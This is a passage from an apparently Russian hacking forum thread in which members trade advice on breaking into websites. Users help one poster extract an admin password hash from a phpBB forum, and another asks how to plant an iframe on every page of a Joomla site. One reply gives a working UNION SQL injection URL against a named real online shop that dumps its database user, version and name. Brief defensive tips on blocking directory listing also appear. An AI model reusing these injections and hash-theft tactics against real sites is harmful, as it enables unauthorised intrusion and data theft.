Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 tor4)
    Скорее всего дефолтное имя столбца изменено, а вообще, нах тебе username ? Тебе же скорее всего админский хэш нужен, а он самый первый в таблице.
    Кста, какой error выпадает ?
     
    3 people like this.
  2. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    error: [an error occurred while processing this directive]

    админский хэш но логины стандартные не катят)
     
  3. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    o_O
    Если пхпбб, зачем тебе логины подбирать, просто зайди www.site.com/forum/profile.php?mode=viewprofile&u=2
     
    4 people like this.
  4. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Спасибо всем, отдельное спасибо jokester. надо было по играть с limit както забыл совсем))
     
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    как произвести иньекцию в PostgreSQL?
     
  6. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    sabe,
    http://www.linuxshare.ru/postgresql/manual/index.html
    postgresql.ru.net/docs.shtml
    http://resurection.ru/doc/postgres/
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 sabe
    ИМХО там нет инъекции, ругается на данные и всё
     
    1 person likes this.
  8. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Joomla

    Народ , кто подскажет , куда в админке joomla поставить ифрейм , чтоб на всех страничка он был ?
    Спасибо !
     
  9. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    2Xszz
    forum.antichat.ru/thread70944.html
     
  10. hall

    hall New Member

    Joined:
    9 Jul 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    я тут недано, и у меня есть вопрос: у нас сайт давно висит и иногда стали приходить разные заказы - там один код, видимо что-то пробовали, а посмотрел и нашел что по адресу site.ru/site/ можно посмотреть все файлы, что из этого могут извлечь и чем грозит???
     
  11. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Они могут только список файлов просмотреть, или и читать что в файлах скриптов (к примеру .php)? Как простейший вариант - могут утянуть дамп БД, т.к. будут знать где лежит (если есть).

    В любом случае лучше закрыть.
     
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Qwazar, я думаю, ты ошибаешься.

    hall, если там просто листинг, то макисмум это грозит тем, что пользователь узнает где и как лежат твои файлы. PHP в этом случае он читать не может, ну если конечно сервер настроен на исполнение .php файлов, как php кода)

    Чтобы это исправить напиши небольшой .htaccess файл:

    Code:
    Options -Indexes
    #дальше просто для верности :)
    IndexIgnore *
    
     
    #2552 n0ne, 9 Jul 2008
    Last edited: 9 Jul 2008
  13. cheb

    cheb Elder - Старейшина

    Joined:
    31 Jul 2006
    Messages:
    42
    Likes Received:
    12
    Reputations:
    0
    не получается подобрать количество полей, все время ошибка. как быть ? _http://www.pvp.kiev.ua/price?id_group=227'
     
  14. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Про то что можно ли читать файлы, это я вопрос задал :)
    Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.
     
    #2554 Qwazar, 9 Jul 2008
    Last edited: 9 Jul 2008
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Qwazar, а, тогда извиняюсь :) Ну я ответил)
     
  16. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    >> Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.
    Не в фильтрации дело. Просто видно каким то хитрожопым способом составлен запрос, и часть запроса после инъекции не отрезается комментариями.
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 cheb
    В этом параметре нет инъекции.Т.е. нет возможности влиять на запрос

    Посмотри сам id_group=227 вывод "группа МФУ"
    id_group=226 вывод "группа ноутбуки"
    id_group=227-1 вывод "группа МФУ"

    Если нужна инъекция на этом сайте вот она :

    http://www.pvp.kiev.ua/price?id_group=244&id_price=-14141+union+select+1,2,3,4,5,concat(user(),char(58),version(),char(58),database()),7,8,9,0,11,12,13,14--

    ветка пятая ,дальше сам если нужно
     
    1 person likes this.
  18. hall

    hall New Member

    Joined:
    9 Jul 2008
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    а если просто в каждой папке сделать файл index.html
    и все, при обращении к папке этот файл же автоматически должен загружаться, тогда и файлы неувидишь... поправьте если мой способ неэффективен... :rolleyes:
     
  19. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    hall, эффективен, но более, как бы сказать...дедовский, что ли)) Вариант с .htaccess'ом более практичен и прост (по крайней мере для меня) :)
     
  20. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    Почему советуют использовать
    mysql_real_escape_string()
    или mysql_escape_string()
    а не addslashes()?

    Можно ли воспользоватся тем что используется addslashes()?

    'SELECT `username` FROM `member` WHERE `id` = \' '. addslashes($str) .' \'

    хммм

    сделал

    $a = "\x1a";

    echo "slesh ".addslashes($a).'<br>';
    echo "mysql ".mysql_real_escape_string($a);

    результат

    slesh 
    mysql \Z

    В 1ом слэш не добввился просто
    а во 2ом не понел откуда \Z взялось oO
     
    #2560 Doom123, 10 Jul 2008
    Last edited: 10 Jul 2008
Thread Status:
Not open for further replies.